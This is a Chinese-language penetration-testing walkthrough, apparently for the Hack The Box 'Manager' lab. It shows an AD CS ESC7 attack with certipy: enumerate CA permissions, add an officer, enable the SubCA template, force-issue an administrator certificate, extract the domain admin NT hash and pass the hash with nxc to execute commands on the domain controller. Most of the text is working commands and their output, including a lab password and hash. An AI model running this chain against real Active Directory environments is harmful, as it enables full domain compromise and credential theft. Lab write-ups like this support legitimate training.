# 一。使用场景:# 1.1 需要有证书服务器 (ADCS)& 配置错误的域用户密码或 hash# 二。使用步骤:
(看使用步骤前,建议先看步骤三注意与踩坑)
# 2.1. 查看域用户配置拿到域用户的 hash 或密码后,用 certipy 工具远程读取用户证书配置是否存在配置错误,如果有错误会显示漏洞存在且打出漏洞名称:
certipy.exe find -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236 -vulnerable -stdout
执行结果如下:
PS D:\ miniconda\ Scripts> certipy.exe find -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236 -vulnerable -stdout Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Finding certificate templates[ *] Found 33 certificate templates[ *] Finding certificate authorities[ *] Found 1 certificate authority[ *] Found 11 enabled certificate templates[ *] Trying to get CA configuration for 'manager-DC01-CA' via CSRA[ *] Got CA configuration for 'manager-DC01-CA' [ *] Enumeration output:Certificate Authorities 0 CA Name : manager-DC01-CA DNS Name : dc01.manager.htb Certificate Subject : CN = manager-DC01-CA, DC = manager, DC = htb Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB Certificate Validity Start : 2023 -07-27 10 :21:05+00:00 Certificate Validity End : 2122 -07-27 10 :31:04+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : MANAGER.HTB\ Administrators Access Rights Enroll : MANAGER.HTB\ Operator MANAGER.HTB\ Authenticated Users MANAGER.HTB\ Raven ManageCertificates : MANAGER.HTB\ Administrators MANAGER.HTB\ Domain Admins MANAGER.HTB\ Enterprise Admins ManageCa : MANAGER.HTB\ Administrators MANAGER.HTB\ Domain Admins MANAGER.HTB\ Enterprise Admins MANAGER.HTB\ Raven [ ! ] Vulnerabilities ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions Certificate Templates : [ ! ] Could not find any certificate templates PS D:\ miniconda\ Scripts>
# 2.2 拿到对应漏洞 (ESC7) 进一步远程攻击# 2.2.1. 创建证书certipy.exe ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236'
执行结果如下:
PS D:\ miniconda\ Scripts> .\ certipy.exe ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236 Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Successfully added officer 'Raven' on 'manager-DC01-CA' PS D:\ miniconda\ Scripts>
# 2.2.2. 启用证书模板certipy.exe ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236'
执行结果如下:
PS D:\ miniconda\ Scripts> .\ certipy.exe ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236 Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Successfully enabled 'SubCA' on 'manager-DC01-CA' PS D:\ miniconda\ Scripts>
# 2.2.3. 请求证书,但是会被拒绝,拒绝后保存私钥和请求 IDcertipy.exe req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10 .11.236
执行结果如下:
PS D:\ miniconda\ Scripts> certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10 .11.236 Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Requesting certificate via RPC[ -] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.[ *] Request ID is 26 Would you like to save the private key? ( y/N) y [ *] Saved private key to 26 .key[ -] Failed to request certificatePS D:\ miniconda\ Scripts>
# 2.2.4. 签发和批准证书certipy.exe ca -ca 'manager-DC01-CA' -issue-request 26 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236
执行结果如下:
PS D:\ miniconda\ Scripts> .\ certipy.exe ca -ca 'manager-DC01-CA' -issue-request 26 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10 .11.236 Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Successfully issued certificate
# 2.2.5. 请求签发的证书 ID,下载对应证书凭证文件 (administrator.pfx)certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 26 -dc-ip 10.10 .11.236
执行结果如下:
PS D:\ miniconda\ Scripts> certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 26 -dc-ip 10.10 .11.236 Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Rerieving certificate with ID 26 [ *] Successfully retrieved certificate[ *] Got certificate with UPN 'administrator@manager.htb' [ *] Certificate has no object SID[ *] Loaded private key from '26.key' [ *] Saved certificate and private key to 'administrator.pfx'
# 2.3. 导出 hash,pth 横向# 2.3.1. 与域控时间同步,不然无法登录linux 同步命令:
sudo ntpdate -s 10.10 .11.236
win 同步命令:
sc start w32time w32tm /config /manualpeerlist:"10.129.102.122" /syncfromflags:manual /reliable:YES /update
# 2.3.2. 通过下载好的证书认证文件 dump 域管 hashcertipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10 .11.236
执行结果如下:
PS D:\ miniconda\ Scripts> certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10 .11.236 Certipy v4.8.2 - by Oliver Lyak ( ly4k) [ *] Using principal: administrator@manager.htb[ *] Trying to get TGT.. .[ *] Got TGT[ *] Saved credential cache to 'administrator.ccache' [ *] Trying to retrieve NT hash for 'administrator' [ *] Got hash for 'administrator@manager.htb' : aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
# 2.3.3.pth/hash 横向拿下域控nxc.exe wmi 10.10 .11.236 -u administrator -H ae5064c2f62317332c88629e025924ef -x 'whoami'
执行结果如下:
PS E:\ 渗透工具\ 提权+内网\ 密码喷洒> .\ nxc.exe wmi 10.10 .11.236 -u administrator -H ae5064c2f62317332c88629e025924ef -x 'whoami' RPC 10.10 .11.236 135 DC01 [ *] Windows NT 10.0 Build 17763 ( name:DC01) ( domain:manager.htb) WMI 10.10 .11.236 135 DC01 [ +] manager.htb\ administrator:ae5064c2f62317332c88629e025924ef ( Pwn3d! ) WMI 10.10 .11.236 135 DC01 [ +] Executed command: "whoami" via wmiexec WMI 10.10 .11.236 135 DC01 manager\ administrator
# 三。注意与踩坑# 1. 2.2.1.创建证书 处:ca 名称(-ca 'manager-DC01-CA'),需要从 2.1.查看域用户配置 ,响应结果中的 ca name 中拿到
# 2. 2.2.4.签发和批准证书 处:请求的证书 id(-issue-request 26),需要从 2.2.3.请求证书 ,响应结果中拿到
# 3. 时间同步必须与域控时间同步,不然无法登录( 2.3.1.与域控时间同步 )
番外:
Certipy 命令
Certipy v4.0.0 - by Oliver Lyak ( ly4k) usage: certipy shadow [ -h] [ -account target account] [ -device-id DEVICE_ID] [ -debug] [ -out output file name] [ -scheme ldap scheme] [ -dc-ip ip address] [ -target-ip ip address] [ -target dns/ip address] [ -ns nameserver] [ -dns-tcp] [ -timeout seconds] [ -u username@domain] [ -p password] [ -hashes [ LMHASH:] NTHASH] [ -k] [ -sspi] [ -aes hex key] [ -no-pass] { list,add,remove,clear,info,auto} positional arguments: { list,add,remove,clear,info,auto} Key Credentials action optional arguments: -h, --help show this help message and exit -account target account Account to target. If omitted, the user specified in the target will be used -device-id DEVICE_ID Device ID of the Key Credential Link -debug Turn debug output on output options: -out output file name connection options: -scheme ldap scheme -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part ( FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it -target dns/ip address DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication -ns nameserver Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -timeout seconds Timeout for connections authentication options: -u username@domain, -username username@domain Username. Format: username@domain -p password, -password password Password -hashes [ LMHASH:] NTHASH NTLM hash, format is [ LMHASH:] NTHASH -k Use Kerberos authentication. Grabs credentials from ccache file ( KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -sspi Use Windows Integrated Authentication ( SSPI) -aes hex key AES key to use for Kerberos Authentication ( 128 or 256 bits) -no-pass Don't ask for password ( useful for -k and -sspi)
